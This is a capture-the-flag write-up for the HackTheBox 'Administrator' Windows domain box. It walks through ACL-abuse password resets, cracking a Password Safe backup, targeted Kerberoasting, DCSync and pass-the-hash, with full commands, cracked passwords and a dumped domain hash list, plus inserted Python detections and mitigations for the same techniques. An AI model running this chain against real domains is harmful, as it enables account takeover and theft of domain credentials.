HTB-Administrator

Box Info

Difficulty Medium
OS Windows
IP Address 10.10.11.42

Credentials

As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account:

Olivia : ichliebedich

Port Scanning

# Check all open TCP
sudo rustscan 10.10.11.42 -r 1-65535 --ulimit 5000
# Nmap scan with script on open TCP port
sudo nmap 10.10.11.42 -sCV -Pn -sT -p 21,53,88,135,139,389,445,464,593,636,5985,9389,47001,49470,49665,49664,49666,49667,49668,64855,64860,64867,64880,64912
# Nmap scan vulnerability
sudo nmap -sT -p 21,53,88,135,139,389,445,464,593,636,5985,9389,47001,49470,49665,49664,49666,49667,49668,64855,64860,64867,64880,64912 --script=vuln -O -Pn 10.10.11.42
# Nmap scan with UDP port
sudo nmap -sU --top-ports 20 -Pn 10.10.11.42

PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-19 21:17:07Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49470/tcp open msrpc Microsoft Windows RPC
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
64855/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
64860/tcp open msrpc Microsoft Windows RPC
64867/tcp open msrpc Microsoft Windows RPC
64880/tcp open msrpc Microsoft Windows RPC
64912/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Update DNS

sudo nano /etc/hosts
10.10.11.42 administrator.htb

Service Enumeration

389/tcp - LDAP

Since the machine provides user credentials up front, let's start with BloodHound to collect domain information.

bloodhound-python -u 'olivia' -p 'ichliebedich' -d administrator.htb -ns 10.10.11.42 -c all
sudo neo4j start
bloodhound

Reviewing the collected AD data turns up some interesting users. Olivia's Outbound Object Control (First Degree Object Control) is worth a look, and Transitive Object Control shows more:

Olivia has the GenericAll permission over Michael.
Michael can ForceChangePassword on Benjamin.

Running the pre-built query "Find all the Edges that any UNPRIVILEGED user (based on the admincount:False) has against all the nodes" reveals that Emily has the GenericWrite permission over Ethan.

Ethan's First Degree Object Control shows that he has DCSync rights over the domain.

OLIVIA to BENJAMIN

Let's abuse Olivia's GenericAll over Michael to take over the Michael account using bloodyAD. Clock skew breaks Kerberos, so sync time with the DC first.

python3.13 -m venv venv
source venv/bin/activate

sudo ntpdate -s 10.10.11.42
bloodyAD --host "10.10.11.42" -d "Administrator.htb" -u "olivia" -p "ichliebedich" set password "Michael" "ichliebedich"

Now we can move from Michael to Benjamin in the same way, abusing ForceChangePassword:

bloodyAD --host "10.10.11.42" -d "Administrator.htb" -u "Michael" -p "ichliebedich" set password "Benjamin" "ichliebedich"
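Each of these resets lands on the domain controller as Security Event ID 4724 (an attempt was made to reset an account's password), with the resetting account as Subject and the victim as Target. The following Python is an added detection example, not part of this writeup and not part of bloodyAD: it flags resets performed by anyone outside an assumed help-desk allow-list, and it correlates reset chains where the target of one reset becomes the subject of the next, which is exactly the Olivia -> Michael -> Benjamin hop above. The event records and the AUTHORISED_RESETTERS set are constructed for the example.

```python
"""Detect ACL-abuse password resets from Windows Security Event 4724.

Added example for this writeup; not the author's code and not part of bloodyAD.
Event records are constructed and simplified to flat dicts: "subject" stands for
SubjectUserName (who performed the reset) and "target" for TargetUserName.
"""
from datetime import datetime, timedelta

# Assumption: the accounts legitimately allowed to reset other users' passwords
# in this domain (a help-desk service account and the built-in admin).
AUTHORISED_RESETTERS = {"helpdesk-svc", "administrator"}

# Constructed sample events mirroring the chain olivia -> michael -> benjamin,
# plus one legitimate help-desk reset and one non-reset event (4738, account changed).
SAMPLE_EVENTS = [
    {"time": "2025-03-19T09:02:03", "id": 4724, "subject": "helpdesk-svc", "target": "emma"},
    {"time": "2025-03-19T21:20:11", "id": 4724, "subject": "olivia", "target": "michael"},
    {"time": "2025-03-19T21:23:40", "id": 4724, "subject": "michael", "target": "benjamin"},
    {"time": "2025-03-19T21:23:41", "id": 4738, "subject": "michael", "target": "benjamin"},
]


def _when(event):
    return datetime.fromisoformat(event["time"])


def unauthorised_resets(events, allowed=AUTHORISED_RESETTERS):
    """Return 4724 events whose subject is outside the allow-list of resetters."""
    allowed = {a.lower() for a in allowed}
    return [e for e in events
            if e["id"] == 4724 and e["subject"].lower() not in allowed]


def reset_chains(events, window=timedelta(hours=1)):
    """Find A->B followed by B->C resets within `window`.

    The target of one reset turning into the subject of the next is the
    signature of hopping along ACL edges (GenericAll, ForceChangePassword)
    and almost never happens during legitimate help-desk work.
    Returns (first_subject, pivot_account, final_target) triples.
    """
    resets = sorted((e for e in events if e["id"] == 4724), key=_when)
    chains = []
    for i, first in enumerate(resets):
        for second in resets[i + 1:]:
            if _when(second) - _when(first) > window:
                break  # list is sorted, so no later event can fall inside the window
            if second["subject"].lower() == first["target"].lower():
                chains.append((first["subject"], first["target"], second["target"]))
    return chains


if __name__ == "__main__":
    for e in unauthorised_resets(SAMPLE_EVENTS):
        print(f"[!] {e['time']} {e['subject']} reset the password of {e['target']}")
    for a, b, c in reset_chains(SAMPLE_EVENTS):
        print(f"[!!] reset chain: {a} -> {b} -> {c}")
```

On the mitigation side, the fix is to remove the GenericAll and User-Force-Change-Password ACEs that BloodHound surfaced from unprivileged principals; the detection above is what tells you they were used before the ACL review happened.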

21/tcp - FTP

Looking into Share Moderators, it is the group for the FTP service, so I'll use Benjamin's credentials to access it.

ftp benjamin@10.10.11.42
Password: ichliebedich

Inside the FTP folder there is a Backup.psafe3 file. Let's download it and see what we can do with it.

ftp> binary
ftp> passive
ftp> get Backup.psafe3

Crack the psafe3 master password with John

Some OSINT turned up the note "Different programs may use files with the PSAFE3 file extension for different purposes, so unless you are sure which format your PSAFE3 file is, you may need to try a few different programs."

https://pwsafe.org/quickstart.shtml

https://file.org/extension/psafe3

So I used Password Safe to open it:

sudo apt-get install passwordsafe
pwsafe

The Password Safe database file is protected by a master password.

We can follow the reference link to crack the master password:

pwsafe2john Backup.psafe3 > crack.txt
sudo john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt

Open the psafe3 file with Password Safe

Backup.psafe3:tekieromucho

The database contains three sets of credentials:

alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur

Initiate User Foothold

Validate the recovered passwords

nxc winrm 10.10.11.42 -u user.txt -p pass.txt -d administrator.htb --continue-on-success

Emily's credentials are valid for WinRM access.

Capture the User Flag

evil-winrm -i administrator.htb -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb

Privilege Escalation

From BloodHound we know that Emily has the GenericWrite permission over Ethan. With that, we can use the targetedKerberoast tool to obtain a crackable hash:

sudo ntpdate 10.10.11.42
python3 targetedKerberoast.py -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

Crack Ethan's hash

Let's try hashcat to crack Ethan's password:

hashcat -m 13100 --force ethan.hash /usr/share/wordlists/rockyou.txt

limpbizkit

Session..........: hashcat
Status...........: Cracked

Now that we have Ethan's credentials, we can abuse his DCSync rights to obtain the Administrator NT hash:

impacket-secretsdump -just-dc-user administrator administrator.htb/ethan:"limpbizkit"@10.10.11.42

Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
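The targeted Kerberoast and the DCSync above leave a distinct trail on the domain controller, and the following Python is an added detection example covering both (it is not the writeup's code and not part of targetedKerberoast or Impacket). Adding an SPN to Ethan's account is logged as Event 5136 (directory object modified, attribute servicePrincipalName) when Directory Service Changes auditing is on; the subsequent ticket request is Event 4769 with TicketEncryptionType 0x17 (RC4-HMAC), which is what makes the hash cheap to crack with hashcat mode 13100; and the DCSync shows up as Event 4662 carrying the DS-Replication-Get-Changes control-access GUIDs from an account that is not a domain controller. The event records, the attacker IP 10.10.14.5 and the DC account list are constructed for the example.

```python
"""Detections for targeted Kerberoasting and DCSync from DC Security events.

Added example for this writeup; not the author's code and not part of any of
the tools it uses. Sample events are constructed and flattened to dicts; field
meanings follow the Windows Security log: 5136 = directory object modified,
4769 = Kerberos service ticket requested, 4662 = operation on an AD object.
"""
from datetime import datetime, timedelta

# Well-known control-access-right GUIDs that replication (DCSync) requires.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
RC4_HMAC = "0x17"          # TicketEncryptionType value for RC4-HMAC in 4769
CONTROL_ACCESS = "0x100"   # AccessMask for an extended/control-access right in 4662

# Constructed sample events mirroring the writeup's chain emily -> ethan -> DCSync.
SAMPLE_EVENTS = [
    # Emily (GenericWrite on Ethan) adds an SPN to Ethan's user object ...
    {"time": "2025-03-19T21:40:00", "id": 5136, "subject": "emily",
     "object": "CN=Ethan,CN=Users,DC=administrator,DC=htb",
     "attribute": "servicePrincipalName", "operation": "Value Added"},
    # ... then requests an RC4 service ticket for it from a constructed attacker IP.
    {"time": "2025-03-19T21:40:05", "id": 4769, "account": "emily@ADMINISTRATOR.HTB",
     "service": "ethan", "enc": RC4_HMAC, "ip": "10.10.14.5"},
    # Benign: AES ticket for a computer account.
    {"time": "2025-03-19T21:41:00", "id": 4769, "account": "emily@ADMINISTRATOR.HTB",
     "service": "DC$", "enc": "0x12", "ip": "10.10.14.5"},
    # Ethan exercises replication rights from a plain user account (DCSync) ...
    {"time": "2025-03-19T22:05:00", "id": 4662, "subject": "ethan", "access_mask": CONTROL_ACCESS,
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # ... whereas the DC's own computer account doing so is normal replication.
    {"time": "2025-03-19T22:06:00", "id": 4662, "subject": "DC$", "access_mask": CONTROL_ACCESS,
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
]


def _when(event):
    return datetime.fromisoformat(event["time"])


def _cn(dn):
    """First RDN value of a distinguished name, lower-cased ("CN=Ethan,..." -> "ethan")."""
    return dn.split(",")[0].split("=", 1)[1].lower()


def _guids(properties):
    return {g.strip("{}").lower() for g in properties.split()}


def rc4_service_tickets(events):
    """4769s using RC4 for user-account SPNs: the classic Kerberoast signal."""
    return [e for e in events if e["id"] == 4769 and e["enc"] == RC4_HMAC
            and not e["service"].endswith("$") and e["service"].lower() != "krbtgt"]


def targeted_kerberoast(events, window=timedelta(minutes=30)):
    """Correlate an SPN added to a user (5136) with a following RC4 TGS request (4769).

    Returns (modifier, target_account, requesting_account, source_ip) tuples.
    """
    hits = []
    spn_adds = [e for e in events if e["id"] == 5136
                and e["attribute"].lower() == "serviceprincipalname"
                and e["operation"] == "Value Added"]
    for mod in spn_adds:
        target = _cn(mod["object"])
        for tgs in rc4_service_tickets(events):
            gap = _when(tgs) - _when(mod)
            if tgs["service"].lower() == target and timedelta(0) <= gap <= window:
                hits.append((mod["subject"], target, tgs["account"], tgs["ip"]))
    return hits


def dcsync_attempts(events, dc_accounts):
    """Subjects of 4662s that used replication rights without being a domain controller."""
    dcs = {d.lower() for d in dc_accounts}
    return [e["subject"] for e in events if e["id"] == 4662
            and e["access_mask"] == CONTROL_ACCESS
            and _guids(e["properties"]) & REPLICATION_GUIDS
            and e["subject"].lower() not in dcs]


if __name__ == "__main__":
    print("targeted kerberoast:", targeted_kerberoast(SAMPLE_EVENTS))
    print("dcsync from non-DC:", dcsync_attempts(SAMPLE_EVENTS, {"DC$"}))
```

Two caveats: 4662 for replication is only produced if the domain head object has a SACL auditing extended-right use by Everyone, and 5136 needs the "Directory Service Changes" subcategory enabled. The mitigations mirror the detections: remove the GenericWrite ACE, set service accounts to AES-only via msDS-SupportedEncryptionTypes so RC4 tickets are never issued, and make sure only DC computer accounts hold the replication rights on the domain head.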

Initiate Root Foothold

evil-winrm -i administrator.htb -u administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e


Hashes

python3.13 /home/kali/Desktop/AD/Impacket/examples/secretsdump.py "Administrator.htb/ethan:limpbizkit"@"dc.administrator.htb"
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:409e1ae3a9e1d8531a7d9d2d83d0aa02f0d6c5a5435c621e3304b294fe32d4e9
administrator.htb\michael:aes128-cts-hmac-sha1-96:97cbb32467f5971a85b6beb994d12fdb
administrator.htb\michael:des-cbc-md5:e6851cb51f078ae3
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:85c174190270b6f36bd1318ea26a22c603901a57c78f3316c96f2a334b28107f
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:df0b408d253e548c4ec180a082e3a593
administrator.htb\benjamin:des-cbc-md5:f7013ec492139dc4
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up...